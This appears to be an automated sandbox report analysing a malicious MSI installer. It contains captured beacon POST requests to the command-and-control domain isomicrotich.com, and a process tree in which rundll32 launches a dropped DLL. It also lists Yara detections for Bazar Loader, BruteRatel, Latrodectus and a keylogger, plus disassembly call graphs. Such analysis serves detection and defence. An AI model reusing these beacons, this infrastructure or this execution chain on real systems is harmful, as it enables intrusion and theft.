                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:15 UTC | 571 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BKMIlVCUgLJ7kNUktpNH95xuy%2Bsy32Z7%2BCmLZFVNhTJquL7IKEko30IB6IR9oVAjvAqXJDSk8vYBUrmO6NlMMEIceG%2BBRN0w8mO9gEUA31cDfzkr4%2F9HVNXo3QjMf%2FcXfXv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1af77bad43fd-EWR
2024-10-03 18:48:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.2.7 | 62412 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:16 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:16 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eitZUq9c3a7UUES8HjJztmxJ2%2BBm1i3DaB9s8uh44hv7xBIk%2BxTjb5qLwHTaovHrft3mTg6U%2Fr7ctH0kfShZ1Smosz%2B3E0FMBb6myAkYee1lVX7VlkcoC7slz%2BrX%2Bqiy4TxD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1afe490bc347-EWR
2024-10-03 18:48:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.2.7 | 62414 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:17 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:17 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:17 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIQePy%2BRuNmnLf9URNvjeG6TT4lWfV3lPI%2B3Gf2WV%2FXmBjVdbUo7lOhhmDQ25Q5U46F70ulKv17ecagbcmPle7Cx%2FIFjtno2Mv5FevATrcHBBwci5RcqO1w5lwwSwqWvC%2BoD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b04da250f8c-EWR
2024-10-03 18:48:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.2.7 | 62416 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:18 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:18 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJ5vc%2FljcMmZRsVqo0%2Bzl6f7Kgio2XLjKdNXVlMQWqmtiG7H6SBiDV%2Bhb5AVz2E2NZ9bzBmsuAwetDP%2F27E2Ux1GLHBhgcgWIF91au%2B5ci7ukaOaoqB9Qu8zEgAnCZBbb7Yh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b0b2f05de95-EWR
2024-10-03 18:48:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.2.7 | 62417 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:20 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:20 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CwNC1wn%2B78it%2FAuhDJaTnub2WjTpWH1NmjKkOrpZKXPCosksThdql6stsgTxLFrf1xqw6slsbzdtP5D9hqAzz1z7nM9Rs6Sefgg3NVrlcQZ0mYRi2koD41teTKLzni%2B5nE9r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b184dc38c18-EWR
2024-10-03 18:48:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.2.7 | 62420 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:21 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:21 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwiLShNva6C6lgWXdpy4OJy1gG879%2FwBt6n3Kv8YhcDiiHrhxr3IwSVjHNBOKn7YjTxKrNa7OW6WpCx1H6BeMhHZetGvXggMdbm5V%2Bn1Rja4MllbdTuIt0BLV6c%2BYhQeMCND"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b1eec54c47c-EWR
2024-10-03 18:48:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0



                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:14:44:15
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi"
                                                                                                                                                                                                                                                Imagebase:0x7ff790130000
                                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:14:44:15
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                Imagebase:0x7ff790130000
                                                                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E
                                                                                                                                                                                                                                                Imagebase:0x2f0000
                                                                                                                                                                                                                                                File size:59'904 bytes
                                                                                                                                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\Installer\MSIA029.tmp
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:399'328 bytes
                                                                                                                                                                                                                                                MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                Start time:14:44:16
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0x7b0000
                                                                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:14:44:17
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                Imagebase:0x7ff62c120000
                                                                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:14:45:01
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                Imagebase:0x7ff70ffd0000
                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:38.3%
                                                                                                                                                                                                                                                  Total number of Nodes:389
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
33849 f311d0 RaiseException _com_raise_error 33753->33849 33755 f3539b 33755->33753 33838 f57852 33755->33838 33759 f353e1 33760 f35d30 41 API calls 33759->33760 33773 f353f5 33760->33773 33761 f354cc 33762 f3551d GetForegroundWindow 33761->33762 33787 f35529 33761->33787 33762->33787 33763 f355f7 ShellExecuteExW 33764 f35612 33763->33764 33765 f35609 33763->33765 33766 f35646 33764->33766 33769 f35625 ShellExecuteExW 33764->33769 33847 f35890 6 API calls 33765->33847 33776 f356fd 33766->33776 33777 f3566c GetModuleHandleW GetProcAddress 33766->33777 33767 f35493 GetWindowsDirectoryW 33845 f35b10 70 API calls 33767->33845 33769->33766 33771 f3563d 33769->33771 33848 f35890 6 API calls 33771->33848 33772 f354b4 33846 f35b10 70 API calls 33772->33846 33773->33761 33773->33767 33778 f35721 33776->33778 33779 f3570e WaitForSingleObject GetExitCodeProcess 33776->33779 33781 f3568a AllowSetForegroundWindow 33777->33781 33841 f35940 33778->33841 33779->33778 33781->33776 33782 f35698 33781->33782 33782->33776 33783 f356a1 GetModuleHandleW GetProcAddress 33782->33783 33784 f356b4 33783->33784 33785 f356fa 33783->33785 33790 f356c8 Sleep EnumWindows 33784->33790 33791 f356ed 33784->33791 33785->33776 33787->33763 33788 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33789 f357a8 33788->33789 33789->33550 33790->33784 33790->33791 33918 f35830 GetWindowThreadProcessId GetWindowLongW 33790->33918 33791->33785 33792 f356f3 BringWindowToTop 33791->33792 33792->33785 33795 f35e18 33794->33795 33796 f35ebe GetLastError 33794->33796 33795->33534 33795->33535 33796->33795 33797 f35ec9 33796->33797 33798 f35f0e GetTokenInformation 33797->33798 33799 f35ee9 33797->33799 33801 f35ed9 codecvt 33797->33801 33798->33795 33803 f360d0 45 API calls 3 library calls 33799->33803 33801->33798 33802 f35ef2 33802->33798 33803->33802 33809->33664 33810->33669 33811->33674 33812->33668 33813->33672 33814->33675 33815->33680 33816->33680 33817->33680 33818->33688 
33819->33691 33821->33737 33822->33737 33823->33737 33827 f35d6e 33826->33827 33829 f35d7d 33827->33829 33850 f34a10 41 API calls 4 library calls 33827->33850 33829->33749 33831 f35a03 33830->33831 33832 f359f8 33830->33832 33835 f32310 56 API calls 33831->33835 33836 f35a1a 33831->33836 33833 f35d30 41 API calls 33832->33833 33834 f35a01 33833->33834 33834->33755 33835->33836 33851 f35a60 42 API calls 33836->33851 33852 f57869 33838->33852 33842 f35971 33841->33842 33843 f3572d 33841->33843 33842->33843 33844 f35981 CloseHandle 33842->33844 33843->33788 33844->33843 33845->33772 33846->33761 33847->33764 33848->33766 33850->33829 33851->33834 33857 f57078 33852->33857 33858 f57096 33857->33858 33859 f5708f 33857->33859 33858->33859 33902 f657cc 41 API calls 3 library calls 33858->33902 33865 f576d9 33859->33865 33861 f570b7 33903 f65ab7 41 API calls __Getcoll 33861->33903 33863 f570cd 33904 f65b15 41 API calls std::_Locinfo::_W_Getdays 33863->33904 33867 f57709 ___crtCompareStringW 33865->33867 33870 f576f3 33865->33870 33869 f57720 33867->33869 33867->33870 33868 f576f8 33906 f57017 41 API calls collate 33868->33906 33873 f57702 33869->33873 33907 f65c2a 6 API calls 2 library calls 33869->33907 33905 f57370 14 API calls __dosmaperr 33870->33905 33875 f52937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33873->33875 33874 f5776e 33876 f5778f 33874->33876 33877 f57778 33874->33877 33880 f353d3 33875->33880 33878 f577a5 33876->33878 33879 f57794 33876->33879 33908 f57370 14 API calls __dosmaperr 33877->33908 33883 f57826 33878->33883 33885 f577cc 33878->33885 33892 f577b9 __alloca_probe_16 33878->33892 33910 f57370 14 API calls __dosmaperr 33879->33910 33880->33753 33880->33759 33915 f57370 14 API calls __dosmaperr 33883->33915 33884 f5777d 33909 f57370 14 API calls __dosmaperr 33884->33909 33911 f65bdc 15 API calls 2 library calls 33885->33911 33888 f5782b 33916 f57370 14 API calls __dosmaperr 33888->33916 33891 f577d2 33891->33883 33891->33892 
33892->33883 33895 f577e6 33892->33895 33893 f57813 33917 f52326 14 API calls std::locale::_Locimp::~_Locimp 33893->33917 33912 f65c2a 6 API calls 2 library calls 33895->33912 33897 f57802 33898 f57809 33897->33898 33899 f5781a 33897->33899 33913 f5b762 41 API calls 2 library calls 33898->33913 33914 f57370 14 API calls __dosmaperr 33899->33914 33902->33861 33903->33863 33904->33859 33905->33868 33906->33873 33907->33874 33908->33884 33909->33873 33910->33868 33911->33891 33912->33897 33913->33893 33914->33893 33915->33888 33916->33893 33917->33873

APIs
  • Part of subcall function 00F357C0: GetCurrentProcess.KERNEL32(00000008,?,80A20388,?,-00000010), ref: 00F357D0
  • Part of subcall function 00F357C0: OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
• CoInitialize.OLE32(00000000), ref: 00F34C15
• CoCreateInstance.OLE32(00F772B0,00000000,00000004,00F85104,00000000,?), ref: 00F34C45
• CoUninitialize.COMBASE ref: 00F35187
• _com_issue_error.COMSUPP ref: 00F351B5
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
• String ID:
• API String ID: 928366108-0

APIs
• GetCurrentProcess.KERNEL32 ref: 00F36AC8
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F36AD5
• CloseHandle.KERNEL32(00000000), ref: 00F36AF5
Strings
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: Process$CloseCurrentHandleOpenToken
• String ID: S-1-5-18
• API String ID: 4052875653-4289277601

APIs
• GetCurrentProcess.KERNEL32(00000008,?,80A20388,?,-00000010), ref: 00F357D0
• OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00F3580C
• CloseHandle.KERNEL32(?), ref: 00F35822
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(80A20388,?,?,?,?,?,?,?,?,?,00F756D5,000000FF), ref: 00F3CDE8
                                                                                                                                                                                                                                                    • Part of subcall function 00F31F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00F34251,80A20388,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00F3CEB1
                                                                                                                                                                                                                                                    • Part of subcall function 00F36600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                                                                                                  • String ID: Full command line:
                                                                                                                                                                                                                                                  • API String ID: 1878577176-831861440

Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; entry block 291 at f35e40-f35ebc)
                                                                                                                                                                                                                                                  APIs
